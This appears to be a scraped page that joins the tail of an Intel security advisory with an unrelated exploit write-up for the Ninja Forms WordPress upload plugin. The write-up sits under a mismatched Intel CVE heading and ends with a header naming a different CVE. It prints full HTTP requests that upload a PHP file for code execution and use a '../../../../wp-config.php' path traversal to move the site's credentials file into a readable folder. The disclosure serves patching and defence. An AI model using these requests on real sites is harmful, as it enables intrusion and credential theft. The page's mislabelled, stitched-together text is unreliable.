The additional issues were found internally by Intel employees. Intel would like to thank Alex Gutkin, Arie Haenel, Michael Henry, Moshe Wagner, Tikvah Katz, Yaakov Cohen and Yair Netzer.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

05/14/2019  

Initial Release

1.1

05/20/2019

CVE correction

1.2

07/01/2019

Updated Affected Products

1.3

02/11/2020

Updates to CVE-2019-0090, recommendations and acknowledgements  

1.4

02/14/2020

Clarified versions in CVE-2019-0090  

1.5

03/11/2020

Updates to SPS versions in:

*   CVE-2019-0090, CVE-2019-0093, CVE-2019-0099.  
    
*   Affected products section.   
    

1.6

04/14/2020

Updates to affected SPS versions  

Updates to the recommendation; added link to the Technical whitepaper for CVE-2019-0090  

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

© Intel Corporation.  Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries United States and other countries.  Other names and brands may be claimed as the property of others.

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-0097: INTEL-SA-00213

Path Traversal and Unrestricted File Upload exists in the Ninja Forms plugin before 3.0.23 for WordPress (when the Uploads add-on is activated). This allows an attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) name and tmp_name parameters.

During a recent Pentest for one of our clients, we discovered Path Traversal and Unrestricted File Upload vulnerabilities in the WordPress plugin Ninja Forms with its File Upload extension (v3.0.22) enabled.

This eventually allows an unauthenticated attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) **name** and **tmp\_name** parameters.

**Initial file upload Request:**

POST /wp-admin/admin-ajax.php?action=nf\_fu\_upload HTTP/1.1
Host: testserver.com
Content-Type: multipart/form-data; boundary=---------------------------16345274557837
Content-Length: 522

-----------------------------16345274557837
Content-Disposition: form-data; name="form\_id"

1
-----------------------------16345274557837
Content-Disposition: form-data; name="field\_id"

5
-----------------------------16345274557837
Content-Disposition: form-data; name="nonce"

0f3a997174
-----------------------------16345274557837
Content-Disposition: form-data; name="files"; filename="test.png.doc"
Content-Type: application/msword

<?php phpinfo(); ?>
-----------------------------16345274557837--

**Response:**

HTTP/1.1 200 OK  
Server: nginx/1.14.0 

"data":{    
    "files":\[    
       {    
          "name":"test.png.doc",  
          "type":"application\\/msword",  
          "tmp\_name":"nftmp-14FpD-test.png.doc",  
          "error":0,  
          "size":19  
       }  
    \]  
 }

When the form is submitted the initially uploaded tmp file is moved to a new location:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: testserver.com  
Content-Length: 6850

\--snip--   
"5":{    
  "value":1,  
  "id":5,  
  "files":\[    
     {    
        "name":"test.(php)",  
        "tmp\_name":"nftmp-BNxfG-test.png.doc",  
        "fieldID":5  
     }  
  \]  
 --snip--

The parameter “name” is then “sanitized” by the WordPress function **sanitize\_file\_name**, which essentially only removes a set of predefined special characters:

ninja-forms-uploads/includes/fields/upload.php:124  
$file\_name = sanitize\_file\_name(basename($target\_file)); 

**sanitize\_file\_name**   
Removes special characters that are illegal in filenames    
on certain operating systems and special characters   
requiring special escaping to manipulate at the command line.   
Replaces spaces and consecutive dashes with a single dash.    
Trims period, dash and underscore from beginning and end of filename.    
It is not guaranteed that this function will return a filename   
that is allowed to be uploaded. 

https://developer.wordpress.org/reference/functions/sanitize\_file\_name/

This results in moving the tmp file to its final location:  
/**wp-content/uploads/ninja-forms/1/test.php**

If the upload folder has not been made non-executable explicitly, which is not the case by default, this results in code execution:

code execution

**Path Traversal in tmp\_name**

when submitting the form it is also possible to traverse the filesystem through the tmp\_name parameter as shown below. Keep in mind that tmp files are moved to their new location within the uploads folder!

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: testserver.com  
Content-Length: 6850

\--snip--   
"5":{    
  "value":1,  
  "id":5,  
  "files":\[    
     {    
        "name":"test.doc",  
        "tmp\_name":"../../../../wp-config.php",  
        "fieldID":5  
     }  
  \]  
 --snip--

This results in moving the wp-config.php file to the following location:  
**/wp-content/uploads/ninja-forms/1/test.doc**  

  

The vendor was informed and both vulnerabilities have been fixed in its most recent version (3.0.23). Updating the ninja-forms-uploads plugin is highly recommended! 

\# Exploit Title: Path Traversal and Unrestricted File Upload in Ninja Forms Uploads  
# Date: 05-04-2019  
# Exploit Author: Jasper Weijts, Onvio, https://www.onvio.nl/  
# Vendor Homepage: https://www.ninjaforms.com/  
# Version: <= 3.0.22  
# Tested on: Ubuntu 16 - nginx/1.14.0 - WordPress 5.1.1 - Firefox  
# CVE : CVE-2019-10869

Tag

#firefox